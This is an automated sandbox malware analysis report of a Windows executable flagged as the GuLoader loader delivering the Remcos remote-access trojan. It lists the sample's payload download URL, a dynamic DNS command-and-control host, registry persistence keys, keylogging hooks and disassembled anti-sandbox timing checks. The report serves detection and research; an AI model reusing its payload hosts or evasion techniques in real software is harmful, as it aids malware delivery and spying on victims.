Windows Analysis Report Fec9qUX4at.exe

Overview

General Information

Sample Name: Fec9qUX4at.exe
Analysis ID: 458355
MD5: 2046b941817392e3815535fccb1f39dc
SHA1: 843d243a71131baf9fbe0fcf4ba129f51ee74c8f
SHA256: c0d3da1cefd1a979c8b8ce102fd5d3ff090779f72f4d1098eb383cbbb3480bee
Tags: exe

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Deletes itself after installation
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Virustotal: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Fec9qUX4at.exe Virustotal: Detection: 28%
Source: Fec9qUX4at.exe ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Fec9qUX4at.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: Fec9qUX4at.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49733 -> 194.5.97.128:39200
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE DANILENKODE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 101.99.94.119
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown DNS traffic detected: queries for: wealthyrem.ddns.net
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Fec9qUX4at.exe
Creates a DirectInput object (often for capturing keystrokes)
Source: Fec9qUX4at.exe, 00000000.00000002.338277052.000000000063A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5586A NtAllocateVirtualMemory, 0_2_04F5586A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F505E0 EnumWindows,NtWriteVirtualMemory, 0_2_04F505E0
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F509C7 NtWriteVirtualMemory, 0_2_04F509C7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58F67 NtProtectVirtualMemory, 0_2_04F58F67
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F542D5 NtWriteVirtualMemory, 0_2_04F542D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F558D5 NtAllocateVirtualMemory, 0_2_04F558D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54693 NtWriteVirtualMemory, 0_2_04F54693
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54A46 NtWriteVirtualMemory, 0_2_04F54A46
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54A2D NtWriteVirtualMemory, 0_2_04F54A2D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54C15 NtWriteVirtualMemory, 0_2_04F54C15
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58FBB NtProtectVirtualMemory, 0_2_04F58FBB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5475A NtWriteVirtualMemory, 0_2_04F5475A
Detected potential crypto function
PE file contains strange resources
Source: Fec9qUX4at.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Fec9qUX4at.exe, 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000000.00000002.338242291.00000000005F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000000.336595549.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.490989304.000000001DD60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491075491.000000001E670000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Uses 32bit PE files
Source: Fec9qUX4at.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/4@1/2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File created: C:\Users\user\AppData\Roaming\remcos
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File created: C:\Users\user\AppData\Local\Temp\~DFDAA17C5C5846B2AF.TMP
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: Fec9qUX4at.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Fec9qUX4at.exe Virustotal: Detection: 28%
Source: Fec9qUX4at.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Users\user\Desktop\Fec9qUX4at.exe
Source: unknown Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_00407CF7 push eax; ret 0_2_00407CF8
Source: initial sample Static PE information: section name: .text entropy: 7.05513425915

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File created: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\SysWOW64\wscript.exe File deleted: c:\users\user\desktop\fec9qux4at.exe
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 TerminateProcess, 0_2_04F50C76
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions:
0x00000000 rdtsc
0x00000002 mov eax, 00000001h
0x00000007 cpuid
0x00000009 popad
0x0000000a mov byte ptr [ebx], al
0x0000000c pushad
0x0000000d mov ah, 58h
0x0000000f cmp ah, 00000058h
0x00000012 jne 00007F9040DE846Ch
0x00000018 popad
0x00000019 inc ebx
0x0000001a inc edx
0x0000001b dec ecx
0x0000001c test ecx, ecx
0x0000001e jne 00007F9040DEB55Fh
0x00000020 mov al, byte ptr [edx]
0x00000022 pushad
0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\FANEBREREN.EXE\DYKKERDRAGTSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57DB5 second address: 0000000004F57DB5 instructions:
0x00000000 rdtsc
0x00000002 mov eax, A7105D73h
0x00000007 xor eax, 87E90EABh
0x0000000c xor eax, 91654CB2h
0x00000011 xor eax, B19C1F6Bh
0x00000016 cpuid
0x00000018 test ecx, eax
0x0000001a popad
0x0000001b call 00007F904096867Bh
0x00000020 lfence
0x00000023 mov edx, 2543AA54h
0x00000028 xor edx, 8D843AA0h
0x0000002e xor edx, CC85E3A5h
0x00000034 xor edx, 1BBC7345h
0x0000003a mov edx, dword ptr [edx]
0x0000003c lfence
0x0000003f test bx, bx
0x00000042 cmp ch, dh
0x00000044 ret
0x00000045 sub edx, esi
0x00000047 ret
0x00000048 add edi, edx
0x0000004a dec dword ptr [ebp+000000F8h]
0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h
0x00000057 jne 00007F904096865Ch
0x00000059 call 00007F90409686BCh
0x0000005e call 00007F904096869Eh
0x00000063 lfence
0x00000066 mov edx, 2543AA54h
0x0000006b xor edx, 8D843AA0h
0x00000071 xor edx, CC85E3A5h
0x00000077 xor edx, 1BBC7345h
0x0000007d mov edx, dword ptr [edx]
0x0000007f lfence
0x00000082 test bx, bx
0x00000085 cmp ch, dh
0x00000087 ret
0x00000088 mov esi, edx
0x0000008a pushad
0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57E05 second address: 0000000004F57C28 instructions:
0x00000000 rdtsc
0x00000002 lfence
0x00000005 shl edx, 20h
0x00000008 or edx, eax
0x0000000a ret
0x0000000b mov esi, edx
0x0000000d pushad
0x0000000e mov eax, EA4F4DDBh
0x00000013 add eax, E5347E98h
0x00000018 xor eax, 6744AC76h
0x0000001d add eax, 57389FFCh
0x00000022 cpuid
0x00000024 bt ecx, 1Fh
0x00000028 jc 00007F9040DEBC91h
0x0000002e cmp ch, ch
0x00000030 pushad
0x00000031 mov eax, 00000094h
0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57C28 second address: 0000000004F57E05 instructions:
0x00000000 rdtsc
0x00000002 popad
0x00000003 popad
0x00000004 call 00007F9040968846h
0x00000009 lfence
0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000567DB5 second address: 0000000000567DB5 instructions:
0x00000000 rdtsc
0x00000002 mov eax, A7105D73h
0x00000007 xor eax, 87E90EABh
0x0000000c xor eax, 91654CB2h
0x00000011 xor eax, B19C1F6Bh
0x00000016 cpuid
0x00000018 test ecx, eax
0x0000001a popad
0x0000001b call 00007F904096867Bh
0x00000020 lfence
0x00000023 mov edx, 2543AA54h
0x00000028 xor edx, 8D843AA0h
0x0000002e xor edx, CC85E3A5h
0x00000034 xor edx, 1BBC7345h
0x0000003a mov edx, dword ptr [edx]
0x0000003c lfence
0x0000003f test bx, bx
0x00000042 cmp ch, dh
0x00000044 ret
0x00000045 sub edx, esi
0x00000047 ret
0x00000048 add edi, edx
0x0000004a dec dword ptr [ebp+000000F8h]
0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h
0x00000057 jne 00007F904096865Ch
0x00000059 call 00007F90409686BCh
0x0000005e call 00007F904096869Eh
0x00000063 lfence
0x00000066 mov edx, 2543AA54h
0x0000006b xor edx, 8D843AA0h
0x00000071 xor edx, CC85E3A5h
0x00000077 xor edx, 1BBC7345h
0x0000007d mov edx, dword ptr [edx]
0x0000007f lfence
0x00000082 test bx, bx
0x00000085 cmp ch, dh
0x00000087 ret
0x00000088 mov esi, edx
0x0000008a pushad
0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000567E05 second address: 0000000000567C28 instructions:
0x00000000 rdtsc
0x00000002 lfence
0x00000005 shl edx, 20h
0x00000008 or edx, eax
0x0000000a ret
0x0000000b mov esi, edx
0x0000000d pushad
0x0000000e mov eax, EA4F4DDBh
0x00000013 add eax, E5347E98h
0x00000018 xor eax, 6744AC76h
0x0000001d add eax, 57389FFCh
0x00000022 cpuid
0x00000024 bt ecx, 1Fh
0x00000028 jc 00007F9040DEBC91h
0x0000002e cmp ch, ch
0x00000030 pushad
0x00000031 mov eax, 00000094h
0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000567C28 second address: 0000000000567E05 instructions:
0x00000000 rdtsc
0x00000002 popad
0x00000003 popad
0x00000004 call 00007F9040968846h
0x00000009 lfence
0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 rdtsc 0_2_04F50C76
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\FANEBREREN.exe\DYKKERDRAGTSSoftware\Microsoft\Windows\CurrentVersion\RunOnceAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Fec9qUX4at.exe System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 rdtsc 0_2_04F50C76
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F55BFE LdrInitializeThunk, 0_2_04F55BFE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5546D mov eax, dword ptr fs:[00000030h] 0_2_04F5546D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5864F mov eax, dword ptr fs:[00000030h] 0_2_04F5864F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5380C mov eax, dword ptr fs:[00000030h] 0_2_04F5380C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F585F7 mov eax, dword ptr fs:[00000030h] 0_2_04F585F7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F579C6 mov eax, dword ptr fs:[00000030h] 0_2_04F579C6
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F573B7 mov eax, dword ptr fs:[00000030h] 0_2_04F573B7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F52D7C mov eax, dword ptr fs:[00000030h] 0_2_04F52D7C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58355 mov eax, dword ptr fs:[00000030h] 0_2_04F58355

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp, logs.dat.17.dr Binary or memory string: [ Program Manager ]
Source: Fec9qUX4at.exe, 00000011.00000002.487647862.00000000009D7000.00000004.00000020.sdmp Binary or memory string: Program Managerq
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR